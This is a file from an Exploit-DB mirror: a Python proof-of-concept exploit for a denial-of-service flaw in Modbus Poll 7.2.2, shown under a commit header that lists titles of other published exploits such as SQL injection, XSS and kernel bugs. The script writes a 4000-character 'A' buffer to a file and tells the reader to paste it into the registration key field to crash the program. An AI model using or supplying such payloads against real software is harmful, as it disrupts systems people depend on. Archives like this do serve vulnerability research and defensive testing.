exploit-db-mirror/exploits/windows_x86/dos/45641.py
Offensive Security defa138d04 DB: 2018-10-23
17 changes to exploits/shellcodes

Modbus Poll 7.2.2 - Denial of Service (PoC)
AudaCity 2.3 - Denial of Service (PoC)
Apple Intel GPU Driver - Use-After-Free/Double-Delete due to bad Locking
Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem
Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value
Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory
Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport
Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas

Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)

Countly - Persistent Cross-Site Scripting
Countly - Cross-Site Scripting
MySQL Edit Table 1.0 - 'id' SQL Injection
School ERP Ultimate 2018 - Arbitrary File Download
Oracle Siebel CRM 8.1.1 - CSV Injection
The Open ISES Project 3.30A - 'tick_lat' SQL Injection
School ERP Ultimate 2018 - 'fid' SQL Injection
eNdonesia Portal 8.7 - 'artid' SQL Injection
The Open ISES Project 3.30A - Arbitrary File Download
Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection
2018-10-23 05:01:48 +00:00

27 lines
No EOL
1 KiB
Python
Executable file

# Exploit Title: Modbus Poll 7.2.2 - Denial of Service (PoC)
# Discovery by: Cemal Cihad ÇİFTÇİ
# Discovery Date: 2018-10-19
# Tested Version: 7.2.2
# Vulnerability Type: DOS
# Tested on OS: Windows XP Professional Service Pack 3
# Vendor Homepage: https://www.modbustools.com
# Download Link: https://www.modbustools.com/download.html
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt". Copy the content of the new file "exploit.txt".
# Now start the program. Now when you are inside of the program click Connection button and
# click "connect". It will ask you for registration key. In the field: "Registration Key"
# paste the copied content from "exploit.txt".
# Now click "OK" and see a crash!
#!/usr/bin/python
buffer = "A" * 4000
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"